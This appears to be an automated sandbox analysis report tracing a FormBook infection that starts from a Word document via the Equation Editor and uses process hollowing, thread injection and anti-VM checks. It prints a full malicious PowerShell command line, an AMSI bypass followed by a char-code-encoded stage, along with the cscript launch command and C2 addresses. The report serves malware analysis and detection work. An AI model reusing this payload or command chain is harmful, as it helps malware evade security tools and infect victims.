Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_00B8262B push ecx; ret
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022DDFA1 push ecx; ret
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008E99D push fs; ret
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008EB8A push dword ptr [AD487281h]; ret
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_00086BC6 push esp; iretd
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008DC2C push ecx; ret
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008D4B5 push eax; ret
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008D50B push eax; ret
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008D502 push eax; ret
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008D56C push eax; ret
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008BE96 push ss; retf
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_00087740 push FFFFFFDAh; ret
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008EFC8 push esp; ret

Source: C:\Windows\SysWOW64\cscript.exe

Code function: 13_2_00B86E5C LoadLibraryA,GetProcAddress,GetLastError,

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Windows\SysWOW64\cscript.exe

WMI Queries: IWbemServices::ExecMethod - Win32_Process::CrEaTe

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEB

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\SysWOW64\calc.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\calc.exe	RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe	RDTSC instruction interceptor: First address: 0000000000079904 second address: 000000000007990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe	RDTSC instruction interceptor: First address: 0000000000079B7E second address: 0000000000079B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2680	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\cscript.exe TID: 800	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2808	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2308	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3016	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\SysWOW64\cscript.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\calc.exe

Code function: 11_2_00409AB0 rdtsc

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Source: explorer.exe, 0000000C.00000000.493099167.000000000457A000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000C.00000000.509247877.00000000044E7000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 0000000C.00000000.493099167.000000000457A000.00000004.00000001.sdmp	Binary or memory string: pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech7
Source: explorer.exe, 0000000C.00000000.490369048.000000000029B000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 0000000C.00000000.493209706.00000000045D6000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\cscript.exe

Code function: 13_2_00B86E5C LoadLibraryA,GetProcAddress,GetLastError,

Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B526F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022C0080 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022C00EA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022E26F8 mov eax, dword ptr fs:[00000030h]

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process queried: DebugPort
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process queried: DebugPort
Source: C:\Windows\SysWOW64\calc.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\cscript.exe	Process queried: DebugPort

Source: C:\Windows\SysWOW64\cscript.exe

Code function: 13_2_00B818C4 GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,

Source: C:\Windows\SysWOW64\calc.exe

Code function: 11_2_00409AB0 rdtsc

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\calc.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cscript.exe	Process token adjusted: Debug

Source: C:\Windows\SysWOW64\calc.exe

Code function: 11_2_0040ACF0 LdrLoadDll,

Source: C:\Windows\SysWOW64\cscript.exe

Code function: 13_2_00B81335 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 47.241.96.113 80
Source: C:\Windows\explorer.exe	Domain query: www.foodcartgps.net
Source: C:\Windows\explorer.exe	Domain query: www.milan-sites.com

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\SysWOW64\calc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Injects a PE file into a foreign processes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\calc.exe base: 400000 value starts with: 4D5A

Sample uses process hollowing technique

Show sources

Source: C:\Windows\SysWOW64\calc.exe

Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: B80000

Writes to foreign memory regions

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\calc.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\calc.exe base: 401000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\calc.exe base: 7EFDE008

Queues an APC in another process (thread injection)

Show sources

Source: C:\Windows\SysWOW64\calc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\SysWOW64\calc.exe	Thread register set: target process: 1764
Source: C:\Windows\SysWOW64\calc.exe	Thread register set: target process: 1764
Source: C:\Windows\SysWOW64\cscript.exe	Thread register set: target process: 1764

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$91534784575270519153478457527051915347845752705191534784575270519153478457527051=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C cscript %tmp%\Client.vbs A C
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\calc.exe {path}
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\WINDOWS\syswow64\calc.exe"

Source: explorer.exe, 0000000C.00000000.505250749.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.528027687.0000000000750000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000C.00000000.527766605.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmp	Binary or memory string: ProgmanG
Source: explorer.exe, 0000000C.00000000.505250749.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.528027687.0000000000750000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: explorer.exe, 0000000C.00000000.505250749.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.528027687.0000000000750000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Source: C:\Windows\SysWOW64\cscript.exe	Code function: GetUserDefaultLCID,GetLocaleInfoA,LoadStringA,GetModuleFileNameA,LoadLibraryExA,LoadLibraryExA,LoadLibraryExA,lstrlenA,___swprintf_l,LoadLibraryExA,LoadLibraryExA,GetUserDefaultLCID,GetLocaleInfoA,___swprintf_l,LoadLibraryExA,LoadLibraryExA,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: GetLocaleInfoW,wcsncmp,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\cscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\SysWOW64\cscript.exe

Code function: 13_2_00B82FA1 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

Source: C:\Windows\SysWOW64\cscript.exe

Code function: 13_2_00B8386A RegCloseKey,SysFreeString,RegCloseKey,RegCloseKey,RegCloseKey,RegisterEventSourceW,GetUserNameW,LookupAccountNameW,LookupAccountNameW,??2@YAPAXI@Z,??2@YAPAXI@Z,LookupAccountNameW,??3@YAXPAX@Z,ReportEventW,DeregisterEventSource,??3@YAXPAX@Z,??3@YAXPAX@Z,

Source: C:\Windows\SysWOW64\cscript.exe

Code function: 13_2_00B8587A GetVersionExA,

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
